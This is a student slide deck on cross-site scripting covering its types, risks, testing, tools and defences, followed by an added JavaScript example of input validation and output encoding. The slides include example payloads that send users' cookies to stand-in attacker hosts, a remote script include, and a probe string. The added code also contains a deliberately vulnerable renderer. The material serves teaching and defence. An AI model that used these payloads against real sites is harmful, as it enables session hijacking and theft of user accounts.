Cross Site Scripting (XSS)

Cross Site Scripting (XSS) allows malicious code to be inserted and executed in a trusted website. There are three main types of XSS attacks: reflected (non-persistent), stored (persistent), and local. XSS risks include stealing cookies, hijacking sessions, and spying on users. Developers can prevent XSS by validating all user inputs, encoding outputs, and using web application firewalls.

Uploaded by Shiva Raju
Copyright: © Attribution Non-Commercial (BY-NC)

Cross Site Scripting (XSS)

R. Siva (IV CSE)

Cross Site Scripting: Outline


Definition
Risks
Types
Testing
Tools
All Together
Defense
References

Definition
Cross Site Scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is trusted.
The trusted website is used to store, transport, or deliver malicious content to the victim.
The target is to trick the client browser into executing malicious scripting commands: JavaScript, VBScript, ActiveX, HTML, or Flash.
Caused by insufficient input validation.

Cross Site Scripting Risks


XSS can:
Steal cookies
Hijack a user's session
Gain unauthorized access
Modify the content of the web page (inserting words or images, misinformation, bad reputation)
Spy on what you do
Network mapping
XSS viruses

Cross Site Scripting Types


Three known types:
Reflected (Non-Persistent)
Link in other website or email

Stored (Persistent)
Forum, bulletin board, feedback form

Local
Adobe Reader (PDF), Flash Player

Reflected (Non-Persistent)

1. Attacker sends an e-mail with <script> tags embedded in the link:
http://mybank.com/account.php?variable=><script>document.location=http://www.badguy.com/cgi-bin/cookie.cgi%20+document.cookie</script>

2. Victim follows the link and the script executes; the cookie is sent to the cookie collector at www.badguy.com.

Malicious content does not get stored on the server.
The server bounces the original input back to the victim without modification.

Stored (Persistent)

Public forum web site

1. Attacker uploads malicious scripting commands to the public forum:
Great message! <script> var img=new Image(); img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie; </script>

2. Victim browses the forum and downloads the malicious code.

The server stores the malicious content.
The server serves the malicious content in its original form.

Local

1. Attacker sends an e-mail with a link:
http://freeebook.com/haha.pdf#a=javascript:alert(Boo);

2. Victim requests http://freeebook.com/haha.pdf; the browser ignores everything after #.

The PDF viewer gets the full URL from the browser (including the content after #) and executes the JavaScript.

The injected script does not traverse to the server.
Arising fast as the major threat as the other two types of XSS are getting fixed.

Cross Site Scripting Testing


Where to start?
Search box
Feedback/Guestbook
Application forms
Look for input that can be displayed back by the site: <script>alert(Boo)</script>

Don't forget to test with different encoding schemes: Base64, URL, Unicode

Cross Site Scripting Tools


N-stalker
Acunetix
Paros
Firefox add-ons: Hackbar, XSS ME

Cross Site Scripting All Together

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Cross Site Scripting Defense


Client side
Disable JS
Verify email
Always update

Server side
Input validation (blacklisting vs. whitelisting)
Encode all meta characters sent to the client
Keep track of user sessions
Web application firewall
Always test
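The two server-side items above, allow-list input validation and output encoding, worked through in JavaScript as an added example (not code from the slides): the account page name, the allow-list regex and the sample strings are constructed for illustration, and the stored-style post points at a reserved example.invalid host.

```javascript
// Added example (not from the slides): allow-list input validation plus HTML
// output encoding, applied to the account.php parameter from the reflected slide
// and to a forum post from the stored slide. Plain Node.js; the regex and the
// sample strings are constructed for illustration.

// Encode the HTML metacharacters so the browser renders the value as text
// inside an element body ("encode all meta characters sent to the client").
function encodeForHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")   // first, so the entities added below are not re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable account page: echoes the query parameter unchanged (reflected XSS).
function renderAccountVulnerable(variable) {
  return `<p>Account: ${variable}</p>`;
}

// Hardened account page: decode the URL encoding once (the "different encoding
// scheme" point from the testing slide), allow-list the canonical value, then
// encode on output anyway (defence in depth).
function renderAccountHardened(variable) {
  let decoded;
  try {
    decoded = decodeURIComponent(variable);
  } catch (e) {
    return "<p>Invalid account</p>";   // malformed %-sequence: reject, never echo
  }
  if (!/^[A-Za-z0-9_-]{1,32}$/.test(decoded)) {
    return "<p>Invalid account</p>";
  }
  return `<p>Account: ${encodeForHtml(decoded)}</p>`;
}

// Forum post: free text cannot be allow-listed, so output encoding alone has to
// make a stored payload inert when the server serves it back.
function renderForumPost(message) {
  return `<div class="post">${encodeForHtml(message)}</div>`;
}

// Constructed inputs: the probe from the testing slide and a stored-style post.
const PROBE = "<script>alert(Boo)</script>";
const POST = 'Great message! <script>new Image().src="http://example.invalid/?s="+document.cookie</script>';
```

renderAccountVulnerable(PROBE) keeps the script tag intact, while the hardened renderers either reject the value or return it as entity-encoded text that the browser displays rather than runs.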

Cross Site Scripting: References


RSnake, XSS Cheat Sheet: http://ha.ckers.org/xss.html
XSS Attack information: http://xssed.com/
OWASP, Testing for XSS: http://www.owasp.org/index.php/Testing_for_Cross_site_scripting
Klein, A., DOM Based Cross Site Scripting: http://www.webappsec.org/projects/articles/071105.shtml
Acunetix web application security: http://www.acunetix.com
N-stalker: http://www.nstalker.com
How to use XSS ME: http://a4apphack.com/index.php/featured/secfox-xssme-automated-xss-detection-infirefoxpart-3
SANS Web Application Security Workshop
